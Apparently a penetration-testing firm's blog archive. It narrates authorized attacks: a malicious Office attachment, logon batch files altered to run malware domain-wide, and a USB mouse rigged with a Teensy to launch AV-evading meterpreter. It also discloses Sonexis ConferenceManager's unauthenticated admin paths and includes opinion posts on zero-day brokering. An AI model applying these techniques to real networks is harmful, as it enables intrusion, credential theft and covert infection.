Archive for the ‘Research’ Category

Whistleblower Series – The real problem with China isn’t China, its you.

Terms like China, APT and Zero-Day are synonymous with Fear, Uncertainty and Doubt (FUD).  The trouble is that, in our opinion anyway, these terms and respective news articles detract from the actual problem.  For example, in 2011 only 0.12% of compromises were attributed to zero-day exploitation and 99.88% were attributed to known vulnerabilities.  Yet, despite this fact the media continued to write about the zero-day threat as if it was a matter of urgency.  What they really should have been writing about is that the majority of people aren’t protecting their networks properly.  After all, if 99.88% of all compromises were the result of the exploitation of known vulnerabilities then someone must not have been doing their job. Moreover, if people are unable to protect their networks from the known threat then how are they ever going to defend against the unknown?

All of the recent press about China and their Advanced Persistent Threat is the same, it detracts from the real problem.  More clearly, the problem isn’t China, Anonymous, LulzSec, or any other FUD ridden buzzword.  The problem is that networks are not being maintained properly from a security perspective and so threats are aligning with risks to successfully affect penetration.  A large part of the reason why these networks are such soft targets is because  their maintainers are sold a false sense of security from both the services and technology perspective.

In this article we’ll show you how easy it was for us to hack into a sensitive government network that was guarded by industry technologies and testing best practices.  Our techniques deliberately mimicked those used by China.  You’ll notice that the  techniques aren’t particularly advanced (despite the fact that the press calls them Advanced) and in fact are based largely on common sense.  You’ll also notice that we don’t exploit a single vulnerability other than those that exist in a single employee (the human vulnerability).  Because this article is based on an actual engagement we’ve altered certain aspects of our story to protect our customer and their respective identity.  We should also make mention that since the delivery of this engagement our customer has taken effective steps to defeat this style of attack.

Here’s the story…

We recently (relatively speaking anyway) delivered a nation state style attack against one of our public sector customers.  In this particular case our testing was unrestricted and so we were authorized to perform Physical, Social and Electronic attacks.  We were also allowed to use any techniques and technologies that were available should we feel the need.

Lets start off by explaining that our customers network houses databases of sensitive information that would be damaging if exposed.  They also have significantly more political weight and authority than most of the other departments in their area.  The reason why they were interested in receiving a nation-state style Penetration Test is because another department within the same area had come under attack by China. 

We began our engagement with reconnaissance.  During this process we learned that the target network was reasonably well locked down from a technical perspective.  The external attack surface provided no services or application into which we could sink our teeth.  We took a few steps back and found that the supporting networks were equally protected from a technical perspective.  We also detected three points where Intrusion Prevention was taking place, one at the state level,  one at the department level, and one functioning at the host level.

(It was because of these protections and minimalistic attack surface that our client was considered by many to be highly secure.)

When we evaluated our customer from a social perspective we identified a list of all employees published on a web server hosted by a yet another  department.  We were able to build micro-dossiers for each employee by comparing employee names and locations to various social media sites and studying their respective accounts.  We quickly constructed a list of which employees were not active within specific social networking sites and lined them up as targets for impersonation just in case we might need to become someone else.

We also found a large document repository (not the first time we’ve found something like this) that was hosted by a different department.  Contained within this repository was a treasure trove of Microsoft Office files with respective change logs and associated usernames.  We quickly realized that this repository would be an easy way into our customers network.  Not only did it provide a wealth of META data, but it also provided perfect pretexts for Social Engineering… and yes, it was open to the public.

(It became glaringly apparent to us that our customer had overlooked their social points of risk and exposure and were highly reliant on technology to protect their infrastructure and information.  It was also apparent that our customer was unaware of their own security limitations with regards to technological protections.  Based on what we read in social forums, they thought that IPS/IDS and Antivirus technologies provided ample protection.)

We downloaded a Microsoft Office document that had a change log that indicated that it was being passed back and fourth between one of our customers employees and another employee in different department.  This was ideal because a trust relationship had already been established and was ripe for the taking.  Specifically, it was “normal” for one party to email this document to the other as a trusted attachment.  That normalcy provided the perfect pretext.

(Identifying a good pretext is critically important when planning on launching Social Engineering attacks.  A pretext is a good excuse or reason to do something that is not accurate.  Providing a good pretext to a victim often causes a victim to perform actions that they should not perform.)

Once our document was selected we had our research team build custom malware specifically for the purpose of embedding it into the Microsoft Office document.  As is the case with all of our malware, we built in automatic self-destruct features and expiration dates that would result in clean deinstallation when triggered.  We also built in covert communication capabilities as to help avoid detection.

(Building our own malware was not a requirement but it is something that we do.  Building custom malware ensures that it will not be detected, and it ensures that it will have the right features and functions for a particular engagement.)

Once the malware was built and embedded into the document we tested it in our lab network.  The malware functioned as designed and quickly established connectivity with its command and control servers.   We should mention that we don’t build our malware with the ability to propagate for liability and control reasons.  We like keeping our infections highly targeted and well within scope.

When we were ready to begin our attack we fired off a tool designed to generate a high-rate of false positives in Intrusion Detection / Prevention systems and Web Application Firewalls alike.  We ran that tool against our customers network and through hundreds of different proxies to force the appearance of multiple attack sources.  Our goal was to hide any real network activity behind a storm of false alarms.

(This demonstrates just how easily Intrusion Detection and Prevention systems can be defeated.   These systems trust network data and generate alerts based on that network data.  When an attacker forges network data then that attacker can also forge false alerts.   Generate enough false alerts and you disable ones ability to effectively monitor the real threat.)

While that tool was running we forged an email to our customers employee from the aforementioned trusted source.  That email contained our infected Microsoft Office document as an attachment.  Within less than three minutes our target received the email and opened the infected attachment thus activating our malware.  Once activated our malware connected back to its command and control server and we had successfully penetrated into our customer’s internal IT infrastructure.  We’ll call this initial point of Penetration T+1.  Shortly after T+1 we terminated our noise generation attack.

(The success of our infection demonstrates how ineffective antivirus technologies are at preventing infections from unknown types of malware.  T+1 was using a current and well respected antivirus solution.  That solution did not interfere with our activities.  The success of our penetration at this point further demonstrates the risk introduced by the human factor.  We did not exploit any technological vulnerability but instead exploited human trust.         )

Now that we had access we needed to ensure that we kept it.  One of the most important aspects of maintaining access is monitoring user activity.  We began taking screenshots of T+1’s desktop every 10 seconds.  One of those screenshots showed T+1 forwarding our email off to their IT department because they thought that the attachment looked suspicious.  While we were expecting to see rapid incident response, the response never came.  Instead, to our surprise, we received a secondary command and control connection from a newly infected host (T+2).

When we began exploring T+2 we quickly realized that it belonged to our customers head of IT Security.  We later learned that he received the email from T+1 and scanned the email with two different antivirus tools.  When the email came back as clean he opened the attachment and infected his own machine.  Suspecting nothing he continued to work as normal… and so did we.

Next we began exploring the file system for T+1. When we looked at the directory containing users batch files we realized that their Discretionary Access Control Lists (DACL’s) granted full permissions to anyone (not just domain users).  More clearly, we could read, write, modify and delete any of the batch files and so decided to exploit this condition to commit a mass compromise.

To make this a reality, our first task was to identify a share that would allow us to store our malware installer.  This share had to be accessible in such a way that when a batch file was run it could read and execute the installer.  As it turned out the domain controllers were configured with their entire C:\ drives shared and the same wide open DACL’s.

We located a path where other installation files were stored on one of the domain controllers.  We placed a copy of our malware into that location and named it “infection.exe”.  Then using a custom script we modified all user batch files to include one line that would run “infection.exe” whenever a user logged into a computer system.  The stage was set…

In no time we started receiving connections back from desktop users including but not limited to the desktops belonging to each domain admin.  We also received connections back from domain controllers, exchange servers, file repositories, etc.  Each time someone accessed a system it became infected and fell under our control.

While exploring the desktops for the domain administrators we found that one admin kept a directory called “secret”.   Within that directory were backups for all of the network devices including intrusion prevention systems, firewalls, switches, routers, antivirus, etc.  From that same directory we also extracted viso diagrams complete with IP addresses, system types, departments, employee telephone lists, addresses, emergency contact information, etc.

At this point we decided that our next step would be to crack all passwords.  We dumped passwords from the domain controller and extracted passwords from the backed up configuration files.  We then fed our hashes to our trusted cracking machine and successfully cracked 100% of the passwords.

(We should note that during the engagement we found that most users had not changed their passwords since their accounts had been created.  We later learned that this was a recommendation made by their IT staff.  The recommendation was based on an article that was written by a well-respected security figure. ).

With this done, we had achieved an irrecoverable and total infrastructure compromise.  Had we been a true foe then there would be no effective way to remove our presence from the network.  We achieved all of this without encountering any resistance, without exploiting a single technological vulnerability, without detection (other than the forwarded email of course) and without the help of China.  China might be hostile but then again so are we.

 

 

Create PDF    Send article as PDF   

83% of businesses have no established security plan (but they’ve got Kool-Aid)

I (Adriel) read an article published by Charles Cooper of c|net regarding small businesses and their apparent near total lack of awareness with regards to security.  The article claims that 77% of small- and medium-sized businesses think that they are secure yet 83% of those businesses have no established security plan.  These numbers were based on a survey of 1,015 small- and medium-sized businesses that was carried out by the National Cyber Security Alliance and Symantec.

These numbers don’t surprise me at all and, in fact, I think that this false sense of security is an epidemic across businesses of all sizes, not just small-to-medium.  The question that people haven’t asked is why does this false sense of security exist in such a profound way? Are people really ok with feeling safe when they are in fact vulnerable?  Perhaps they are being lied to and are drinking the Kool-Aid…

What I mean is this.  How many software vendors market their products as secure only to have someone identify all sorts of critical vulnerabilities in it later?  Have you ever heard a software vendor suggest that their software might not be highly secure?  Not only is the suggestion that all software is secure an absurd one, but it is a blatant lie.  A more truthful statement is that all software is vulnerable unless it is mathematically demonstrated to be flawless (which by the way is a near impossibility).

Very few software vendors hire third-party  vulnerability discovery and exploitation experts to perform genuine reviews of their products. This is why I always recommend using a third-party service (like us) to vet the software from a security perspective before making a purchase decision.  If the software vendor wants to be privy to the results then they should pay for the engagement because in the end it will improve the product. Why should you (their prospective customer) pay to have their product improved?  Shouldn’t that be their responsibility?  Shouldn’t they be doing this as a part of the software development lifecycle?

Security vendors are equally responsible for promoting a false sense of security.  For example, how many antivirus companies market their technology in such a way that might be perceived as an end-all, be-all solution to email threats, viruses, and trojans, etc.,? Have you ever heard antivirus software vendors say anything like “we will protect you from most viruses, worms, etc.”?  Of course not. That level of honesty would leave doubt in the minds of their customers, which would impede sales.  Truth is, their customers should have doubt because antivirus products are only partially effective and can be  subverted, as we’ve demonstrated before.  Despite this fact, uninformed people still feel safe because they use antivirus software.

Let’s not only pick on antivirus software companies though, what about companies that are supposed to test the security of networks and information systems (like us for example)?  We discussed this a bit during our “Thank You Anonymous” blog entry.   Most businesses that sell penetration testing services don’t deliver genuine penetration tests despite the fact that they call their services penetration testing services.  What they really sell is the manually vetted product of an automated vulnerability scan.  Moreover, they call this vetting process “manual testing” and so their customers believe they’ve received a quality penetration test when in fact they are depending on an automated program like Nessus to find flaws in their customer networks.  This is the equivalent of testing a bulletproof vest with a squirt gun and claiming that its been tested with a .50 caliber rifle.  Would you want to wear that vest in battle?

It seems to me that security businesses are so focused on revenue generation that they’ve lost sight of the importance of providing clear, factual, complete and balanced information to the public.  It’s my opinion that their competitive marketing methodologies are a detriment to security and actually help to promote the false sense of security referenced in the c|net article above.  Truth is that good security includes the class of products that I’ve mentioned above but that those products are completely useless without capable, well-informed security experts behind them.  Unfortunately not all security experts are actually experts either (but that’s a different story)…

 

 

 

 

 

PDF Download    Send article as PDF   

Selling zero-day’s doesn’t increase your risk, here’s why.

The zero-day exploit market is secretive. People as a whole tend to fear what they don’t understand and substitute fact with speculation.  While very few facts about the zero-day exploit market are publicly available, there are many facts about zero-days that are available.  When those facts are studied it becomes clear that the legitimate zero-day exploit market presents an immeasurably small risk (if any), especially when viewed in contrast with known risks.

Many news outlets, technical reporters, freedom of information supporters, and even security experts have used the zero-day exploit market to generate Fear Uncertainty and Doubt (FUD).  While the concept of a zero-day exploit seems ominous reality is actually far less menacing.  People should be significantly more worried about vulnerabilities that exist in public domain than those that are zero-day.  The misrepresentations about the zero-day market create a dangerous distraction from the very real issues at hand.

One of the most common misrepresentations is that the zero-day exploit market plays a major role in the creation of malware and malware’s ability to spread.  Not only is this categorically untrue but the Microsoft Security Intelligence Report (SIRv11) provides clear statistics that show that malware almost never uses zero-day exploits.  According to SIRv11, less than 6% of malware infections are actually attributed to the exploitation of general vulnerabilities.  Of those successful infections nearly all target known and not zero-day vulnerabilities.

Malware targets and exploits gullibility far more frequently than technical vulnerabilities.  The “ILOVEYOU” worm is a prime example.  The worm would email its self to a victim with a subject of “I LOVE YOU” and an attachment titled “LOVE-LETTER-FOR-YOU.txt.vbs”. The attachment was actually a copy of the worm.  When a person attempted to read the attachment they would inadvertently run the copy and infect their own computer.  Once infected the worm would begin the process again and email copies of its self to the first 50 email addresses in the victims address book.  This technique of exploiting gullibility was so successful that in the first 10 days over 50 million infections were reported.  Had people spent more time educating each other about the risks of socially augmented technical attacks then the impact may have been significantly reduced.

The Morris worm is an example of a worm that did exploit zero-day vulnerabilities to help its spread.  The Morris was created in 1988 and proliferated by exploiting multiple zero-day vulnerabilities in various Internet connectable services.  The worm was not intended to be malicious but ironically a design flaw caused it to malfunction, which resulted in a Denial of Service condition of the infected systems.  The Morris worm existed well before zero-day exploit market was even a thought thus proving that both malware and zero-day exploits will exist with or without the market.  In fact, there is no evidence that shows the existence of any relationship between the legitimate zero-day exploit market and the creation of malware, there is only speculation.

Despite these facts, prominent security personalities have argued that the zero-day exploit market keeps people at risk by preventing the public disclosure of zero-day vulnerabilities. Bruce Schneier wrote, “a disclosed vulnerability is one that – at least in most cases – is patched”.  His opinion is both assumptive and erroneous yet shared by a large number of security professionals.  Reality is that when a vulnerability is disclosed it is unveiled to both ethical and malicious parties. Those who are responsible for applying patches don’t respond as quickly as those with malicious intent.

According to SIRv11, 99.88% of all compromises were attributed to the exploitation of known (publicly disclosed) and not zero-day vulnerabilities.  Of those vulnerabilities over 90% had been known for more than one year. Only 0.12% of compromises reported were attributed to the exploitation of zero-day vulnerabilities. Without the practice of public disclosure or with the responsible application of patches the number of compromises identified in SIRv11 would have been significantly reduced.

The Verizon 2012 Data Breach Investigations Report (DBIR) also provides some interesting insight into compromises.  According to DBIR 97% of breaches were avoidable through simple or intermediate controls (known / detectable vulnerabilities, etc.), 92% were discovered by a third party and 85% took two weeks or more to discover. These statistics further demonstrate that networks are not being managed responsibly. People, and not the legitimate zero-day exploit market, are keeping themselves at risk by failing to responsibly address known vulnerabilities.  A focus on zero-day defense is an unnecessary distraction for most.

Another issue is the notion that security researchers should give their work away for free.  Initially it was risky for researchers to notify vendors about security flaws in their technology.  Some vendors attempted to quash the findings with legal threats and others would treat researchers with such hostility that it would drive the researchers to the black market.  Some vendors remain hostile even today, but most will happily accept a researchers hard work provided that its delivered free of charge.  To us the notion that security researchers should give their work away for free is absurd.

Programs like ZDI and what was once iDefense (acquired by VeriSign) offer relatively small bounties to researchers who provide vulnerability information.  When a new vulnerability is reported these programs notify their paying subscribers well in advance of the general public.  They do make it a point to work with the manufacturer to close the hole but only after they’ve made their bounty.  Once the vendors have been notified (and ideally a fix created) public disclosure ensues in the form of an email-based security advisory that is sent to various email lists.  At that point, those who have not applied the fix are at a significantly increased level of risk.

Companies like Google and Microsoft are stellar examples of what software vendors should do with regards to vulnerability bounty programs.  Their programs motivate the research community to find and report vulnerabilities back to the vendor.  The existence of these programs is a testament to how seriously both Google and Microsoft take product security. Although these companies (and possibly others) are moving in the right direction, they still have to compete with prices offered by other legitimate zero-day buyers.  In some cases those prices offered are as much as 50% higher.

Netragard is one of those entities. We operate the Exploit Acquisition Program (EAP), which was established in early 2000 as a way to provide ethical security researchers with top dollar for their work product. In 2011 Netragard’s minimum acquisition price (payment to researcher) was $20,000.00, which is significantly greater than the minimum payout from most other programs.  Netragard’s EAP buyer information, as with any business’ customer information, is kept in the highest confidence.  Netragard’s EAP does not practice public vulnerability disclosure for the reasons cited above.

Unlike VUPEN, Netragard will only sell its exploits to US based buyers under contract.  This decision was made to prevent the accidental sale of zero-day exploits to potentially hostile third parties and to prevent any distribution to the Black Market.  Netragard also welcomes the exclusive sale of vulnerability information to software vendors who wish fix their own products.  Despite this not one single vendor has approached Netragard with the intent to purchase vulnerability information.  This seems to indicate that most software vendors are sill more focused on revenue than they are end-user security.  This is unfortunate because software vendors are the source of vulnerabilities.

Most software vendors do not hire developers that are truly proficient at writing safe code (the proof is in the statistics). Additionally, very few software vendors have genuine security testing incorporated into their Quality Assurance process.  As a result, software vendors literally (and usually accidently) create the vulnerabilities that are exploited by hackers and used to compromise their customer’s networks. Yet software vendors continue to inaccurately tout their software as being secure when in fact t isn’t.

If software vendors begin to produce truly secure software then the zero-day exploit market will cease to exist or will be forced to make dramatic transformations. Malware however would continue to thrive because it is not exploit dependent.  We are hopeful that Google and Microsoft will be trend setters and that other software vendors will follow suit.  Finally, we are hopeful that people will do their own research about the zero-day exploit markets instead of blindly trusting the largely speculative articles that have been published recently.


PDF Printer    Send article as PDF   

Netragard on Exploit Brokering

Historically ethical researchers would provide their findings free of charge to software vendors for little more than a mention.  In some cases vendors would react and threaten legal action citing violations of poorly written copyright laws that include but are not limited to the DMCA.  To put this into perspective, this is akin to threatening legal action against a driver for pointing out that the breaks on a school bus are about to fail.

This unfriendliness (among various other things) caused some researchers to withdraw from the practice of full disclosure. Why risk doing a vendor the favor of free work when the vendor might try to sue you?

Organizations like CERT help to reduce or eliminate the risk to security researchers who wish to disclose vulnerabilities.  These organizations work as mediators between the researchers and the vendors to ensure safety for both parties.  Other organizations like iDefense and ZDI also work as middlemen but unlike CERT earn a profit from the vulnerabilities that they purchase. While they may pay a security researcher an average of $500-$5000 per vulnerability, they charge their customers significantly more for their early warning services.  Its also unclear (to us anyway) how quickly they notify vendors of the vulnerabilities that they buy.

The next level of exploit buyers are the brokers.  Exploit brokers may cater to one or more of three markets that include National, International, or Black.  While Netragard’s program only sells to National buyers, companies like VUPEN sell internationally.  Also unlike VUPEN, Netragard will sell exploits to software vendors willing to engage in an exclusive sale.   Netragard’s Exploit Acquisition Program was created to provide ethical researchers with the ability to receive fair pay for their hard work; it was not created to keep vulnerable software vulnerable.  Our bidding starts at $10,000 per exploit and goes up from there.

 

Its important to understandwhat a computer exploit is and is not.  It is a tool or technique that makes full use of and derives benefit from vulnerable computer software.   It is not malware despite the fact that malware may contain methods for exploitation.  The software vulnerabilities that exploits make use of are created by software vendors during the development process.  The idea that security researchers create vulnerability is absurd.  Instead, security researchers study software and find the already existing flaws.

The behavior of an exploit with regards to malevolence or benevolence is defined by the user and not the tool.  Buying an exploit is much like buying a hammer in that they can both be used to do something constructive or destructive.  For this reason it’s critically important that any ethical exploit broker thoroughly vet their customers before selling an exploit.  Any broker that does not thoroughly vet their customers is operating irresponsibly.

What our customers do with the exploits that they buy is none of our business just as what you do with your laptop is not its vendors business.   That being said, any computer system is far more dangerous than any exploit.  An exploit can only target one very specific thing in a very specific way and has a limited shelf life. It is not entirely uncommon for vulnerabilities to be accidentally fixed thus rendering a 0-day exploit useless.  A laptop on the other hand has an average shelf life of 3 years and can attack anything that’s connected to a network.   In either case,  its not the laptop or the exploit that represents danger it’s the intent of its user.

Finally, most of the concerns about malware, spyware, etc. are not only unfounded and unrealistic, but absolutely absurd.  Consider that businesses like VUPEN wants to prevent vendors from fixing vulnerabilities.  If VUPEN were to provide an exploit to a customer for the purpose of creating malware then that would guarantee the death of the exploit.  Specifically, when malware spreads antivirus companies capture and study it.  They would most certainly identify the method of propagation (the exploit) that in turn would result in the vendor fixing the vulnerability.

PDF Creator    Send article as PDF   

Hacking the Sonexis ConferenceManager

Netragard’s Penetration Testing services use a research based methodology called Real Time Dynamic Testing™. Research based methodologies are different in that they focus on identifying both new and known vulnerabilities whereas standard methodologies usually, if not always identify known vulnerabilities. Sometimes when performing research based penetration testing we identify issues that not only affect our customer but also have the potential to impact anyone using a particular technology. Such was the case with the Sonexis ConfrenceManager.

The last time we came across a Sonexis ConferenceManager we found a never before discovered Blind SQL Injection vulnerability.  This time we found a much more serious (also never before discovered) authorization vulnerability. We felt that this discovery deserved a blog entry to help make people aware of the issue as quickly as possible.

What really surprised about this vulnerability was its simplicity and the fact that nobody (not even us) had found it before.  Discovery and exploitation required no wizardry or special talent. We simply had to browse to the affected area of the application and we were given keys to the kingdom (literally). What was even more scary is that this vulnerability could lead to a mass compromise if automated with a specialized Google search (but we won’t give more detail on that here, yet).

So lets dig in…

All versions of the Sonexis ConferenceManager fail to check and see if users attempting to access  the “/admin/backup/settings.asp”, “/admin/backup/download.asp ” or the “/admin/backup/upload.asp ” pages are authorized. Because of this, anyone can browse to one of those pages without first authenticating.  When they do, they’ll have full administrative privileges over the respective Sonexis ConferenceManager pages.  A screen shot of the “settings.asp” age is provided below.

The first thing that we noticed when we accessed the page was that the fields were filled out for us.  This made us curious, especially since the credentials appeared to belong to our customers domain.  When we looked at the document source we found that we didn’t only have the “User ID:” but were also provided with the “Password:” in clear text.

As it turned out, compromising our customer’s IT infrastructure was as simple as using the disclosed credentials to VPN into their network.  Once in we used the same credentials to access Active Directory and to create a second domain administrator account called “netragard”.  We also downloaded the entire password table from Active Directory and began cracking that with hashcat.  While that was being cracked we used our new domain admin account to access any resource that authenticated against Active Directory.  Suffice it to say we had used the Sonexis ConferenceManager vulnerability to compromise the entire IT infrastructure.

But the vulnerabilities didn’t stop there…

As it turns out we could also download the Sonexis ConferenceManager Microsoft SQL database in its entirety.  This was done by changing the configuration in the “settings.asp” page.  Once changed to the right location we were able to download the database (after configuring samba locally).

 

After we downloaded the file (in zip format) we decompressed it.  Decompression revealed the following contents:

Once decompressed we loaded the files into our local MsSQL database and began to explore the contents.  Not only did we have audio recordings, configuration settings, and other sensitive data, but the administrative password for the Sonexis ConferenceManager was also stored in plain text as is shown in the screen shot below. This in and of its self is yet another vulnerability.

We were able to use the credentials to login to the Sonexis ConferenceManager without issue…

Last but not least…

We found that it was also possible to insert a backdoor into our local copy of the Sonexis ConferenceManager database.  Once the backdoor was created we could re-zip the files and upload the “infected” Microsoft SQL database back to the Sonexis ConferenceManager.  Once loaded, the backdoor will activate allowing the attacker to gain entry to the system (again).

Regarding vendor notification…

Sonexis was notified on 1/31/2012 about the authorization vulnerabilities disclosed in this article.  Sonexis responded once (with a less than friendly, non-cooperative response) on 2/1/2012 and a second time (with a very friendly cooperative response) on 2/6/2012.  We replied to the second response providing the full details of our research to Sonexis.  Sonexis took the information and had a quick fix ready for their customers the next day on 02/07/2012!  They notified their customers that same day with the following email.

We’d like to thank Sonexis for taking the time to be receptive and working with us.  Not only is that the right thing to do, but it showed us that Sonexis takes their customer security very seriously.  As it turned out the initial (less than friendly response) was due to a miscommunication (someone not paying attention to what we were telling them).  The second response came from someone else that was actually a great pleasure to work with.  Suffice it to say that in the end we were really quite impressed with how quickly Sonexis pushed out a fix (and yes it works, we verified that).

If you are a Sonexis ConferenceManager user we strongly urge you to update your system now.

Updated on: 02-16-2012

This vulnerability can be exploited from the Internet.   The image below shows a small sample of Sonexis ConferenceManager users who are vulnerable.  This sample was identified using a combination of ruby with a specially crafted google search.

 

 

 

 

 

 

 

 

 

PDF    Send article as PDF   

Netragard’s Badge of Honor (Thank you McAfee)

Here at Netragard We Protect You From People Like Us™ and we mean it.  We don’t just run automated scans, massage the output, and draft you a report that makes you feel good.  That’s what many companies do.  Instead, we “hack” you with a methodology that is driven by hands on research, designed to create realistic and elevated levels of threat.  Don’t take our word for it though; McAfee has helped us prove it to the world.

Through their Threat Intelligence service, McAfee Labs listed Netragard as a “High Risk” due to the level of threat that we produced during a recent engagement.  Specifically, we were using a beta variant of our custom Meterbreter malware (not to be confused with Metasploit’s Meterpreter) during an Advanced Penetration Testing engagement.  The beta malware was identified and submitted to McAfee via our customers Incident Response process.  The result was that McAfee listed Netragard as a “High Risk”, which caught our attention (and our customers attention) pretty quickly.

McAfee Flags Netragard as a High Risk

Badge of Honor

McAfee was absolutely right; we are “High Risk”, or more appropriately, “High Threat”, which in our opinion is critically important when delivering quality Penetration Testing services.  After all, the purpose of a Penetration Test (with regards to I.T security) is to identify the presence of points where a real threat can make its way into or through your IT Infrastructure.  Testing at less than realistic levels of threat is akin to testing a bulletproof vest with a squirt gun.

Netragard uses a methodology that’s been dubbed Real Time Dynamic Testing™ (“RTDT”).  Real Time Dynamic Testing™ is a research driven methodology specifically designed to test the Physical, Electronic (networked and standalone) and Social attack surfaces at a level of threat that is slightly greater than what is likely to be faced in the real world.  Real Time Dynamic Testing™ requires that our Penetration Testers be capable of reverse engineering, writing custom exploits, building and modifying malware, etc.  In fact, the first rendition of our Meterbreter was created as a product of of this methodology.

Another important aspect of Real Time Dynamic Testing™ is the targeting of attack surfaces individually or in tandem.  The “Netragard’s Hacker Interface Device” article is an example of how Real Time Dynamic Testing™ was used to combine Social, Physical and Electronic attacks to achieve compromise against a hardened target.  Another article titled “Facebook from the hackers perspective” provides an example of socially augmented electronic attacks driven by our methodology.

It is important that we thank McAfee for two reasons.  First we thank McAfee for responding to our request to be removed from the “High Risk” list so quickly because it was preventing our customers from being able to access our servers.  Second and possibly more important, we thank McAfee for putting us on their “High Risk” list in the first place.  The mere fact that we were perceived as a “High Risk” by McAfee means that we are doing our job right.

Free PDF    Send article as PDF   

Netragard’s Hacker Interface Device (HID).

We (Netragard) recently completed an engagement for a client with a rather restricted scope. The scope included a single IP address bound to a firewall that offered no services what so ever. It also excluded the use of social attack vectors based on social networks, telephone, or email and disallowed any physical access to the campus and surrounding areas. With all of these limitations in place, we were tasked with penetrating into the network from the perspective of a remote threat, and succeeded.

The first method of attack that people might think of when faced with a challenge like this is the use of the traditional autorun malware on a USB stick. Just mail a bunch of sticks to different people within the target company and wait for someone to plug it in; when they do its game over, they’re infected. That trick worked great back in the day but not so much any more. The first issue is that most people are well aware of the USB stick threat due to the many published articles about the subject. The second is that more and more companies are pushing out group policies that disable the autorun feature in Windows systems. Those two things don’t eliminate the USB stick threat, but they certainly have a significant impact on its level of success and we wanted something more reliable.

Enter PRION, the evil HID.


 

A prion is an infectious agent composed of a protein in a misfolded form. In our case the prion isn’t composed of proteins but instead is composed of electronics which include a teensy microcontroller, a micro USB hub (small one from RadioShack), a mini USB cable (we needed the ends) a micro flash drive (made from one of our Netragard USB Streamers), some home-grown malware (certainly not designed to be destructive), and a USB device like a mouse, missile turret, dancing stripper, chameleon, or whatever else someone might be tempted to plug in. When they do plug it in, they will be infected by our custom malware and we will use that point of infection to compromise the rest of the network.

For the purposes of this engagement we choose to use a fancy USB logitech mouse as our Hacker Interface Device / Attack Platform. To turn our logitech Human Interface Device into a Hacker Interface Device, we had to make some modifications. The first step of course was to remove the screw from the bottom of the mouse and pop it open. Once we did that we disconnected the USB cable from the circuit board in the mouse and put that to the side. Then we proceed to use a drummel tool to shave away the extra plastic on the inside cover of the mouse. (There were all sorts of tabs that we could sacrifice). The removal of the plastic tabs was to make room for the new hardware.

Once the top of the mouse was gutted and all the unnecessary parts removed we began to focus on the USB hub. The first thing we had to do was to extract the board from the hub. Doing that is a lot harder than it sounds because the hub that we chose was glued together and we didn’t want to risk breaking the internals by being too rough. After about 15 minutes of prying with a small screwdriver (and repeated accidental hand stabbing) we were able to pull the board out from the plastic housing. We then proceeded to strip the female USB connectors off of the board by heating their respective pins to melt the solder (careful not to burn the board). Once those were extracted we were left with a naked USB hub circuit board that measured about half an inch long and was no wider than a small bic lighter.

With the mouse and the USB board prepared we began the process of soldering. The first thing that we did was to take the mini USB cable, cut one of the ends off leaving about 1 inch of wire near the connector. Then we stripped all plastic off of the connector and stripped a small amount of wire from the 4 internal wires. We soldered those four wires to the USB board making sure to follow theright pinout pattern. This is the cable that will plug into the teensy mini USB port when we insert the teensy microcontroller.

Once that was finished we took the USB cable that came with the mouse and cut the circuit board connector off of the end leaving 2 inchs of wire attached. We stripped the tips of the 4 wires still attached to the connector and soldered those to the USB hub making sure to follow the right pinout patterns mentioned above. This is an important cable as its the one that connects the USB hub to the mouse. If this cable is not soldered properly and the connections fail, then the mouse will not work. We then took the other piece of the mouse cable (the longer part) and soldered that to the USB board. This is the cable that will connect the mouse to the USB port on the computer.

At this point we have three cables soldered to the USB hub. Just to recap those cables are the mouse connector cable, the cable that goes from the mouse to the computer, and the mini USB adapter cable for the teensy device. The next and most challenging part of this is to solder the USB flash drive to the USB hub. This is important because the USB flash drive is where we store our malware. If the drive isn’t soldered on properly then we won’t be able to store our malware on the drive and the the attack would be mostly moot. ( We say mostly because we could still instruct the mouse to fetch the malware from a website, but that’s not covert.)

To solder the flash drive to the USB hub we cut about 2 inches of cable from the mini USB connector that we stole the end from previously. We stripped the ends of the wires in the cable and carefully soldered the ends to the correct points on the flash drive. Once that was done we soldered the other ends of the cable to the USB hub. At that point we had everything soldered together and had to fit it all back into the mouse. Assembly was pretty easy because we were careful to use as little material as possible while still giving us the flexibility that we needed. We wrapped the boards and wires in single layers of electrical tape as to avoid any shorts. Once everything was we plugged in we tested the devices. The USB drive mounted, the teensy card was programmable, and the mouse worked.

Time to give prion the ability to infect…

We learned that the client was using Mcafee as their antivirus solution because one of their employees was complaining about it on Facebook. Remember, we weren’t allowed to use social networks for social engineering but we certainly were allowed to do reconnaissance against social networks. With Mcafee in our sights we set out to create custom malware for the client (as we do for any client and their respective antivirus solution when needed). We wanted our malware to be able to connect back to Metasploit because we love the functionality, we also wanted the capabilities provided by meterpreter, but we needed more than that. We needed our malware to be fully undetectable and to subvert the “Do you want to allow this connection” dialogue box entirely. You can’t do that with encoding…

Update: As of 06/29/2011 9AM EST: this variant of our pseudomalware is being detected by Mcafee.

Update: As of 06/29/2011 10:47AM EST: we’ve created a new variant that seems to bypass any AV.

To make this happen we created a meterpreter C array with the windows/meterpreter/reverse_tcp_dns payload. We then took that C array, chopped it up and injected it into our own wrapper of sorts. The wrapper used an undocumented (0-day) technique to completely subvert the dialogue box and to evade detection by Mcafee. When we ran our tests on a machine running Mcafee, the malware ran without a hitch. We should point out that our ability to evade Mcafee isn’t any indication of quality and that we can evade any Antivirus solution using similar custom attack methodologies. After all, its impossible to detect something if you don’t know what it is that you are looking for (It also helps to have a team of researchers at our disposal).

Once we had our malware built we loaded it onto the flash drive that we soldered into our mouse. Then we wrote some code for the teensy microcontroller to launch the malware 60 seconds after the start of user activity. Much of the code was taken from Adrian Crenshaw’s website who deserves credit for giving us this idea in the first place. After a little bit of debugging, our evil mouse named prion was working flawlessly.

Usage: Plug mouse into computer, get pwned.

The last and final step here was to ship the mouse to our customer. One of the most important aspects of this was to repack the mouse in its original package so that it appeared unopened. Then we used Jigsaw to purchase a list of our client’s employes. We did a bit of reconnaissance on each employee and found a target that looked ideal. We packaged the mouse and made it look like a promotional gadget, added fake marketing flyers, etc. then shipped the mouse. Sure enough, three days later the mouse called home.

 

Create PDF    Send article as PDF   

Quality Penetration Testing by Netragard

The purpose of Penetration Testing is to identify the presence of points where an external entity can make its way into or through a protected entity. Penetration Testing is not unique to IT security and is used across a wide variety of different industries.  For example, Penetration Tests are used to assess the effectiveness of body armor.  This is done by exposing the armor to different munitions that represent the real threat. If a projectile penetrates the armor then the armor is revised and improved upon until it can endure the threat.

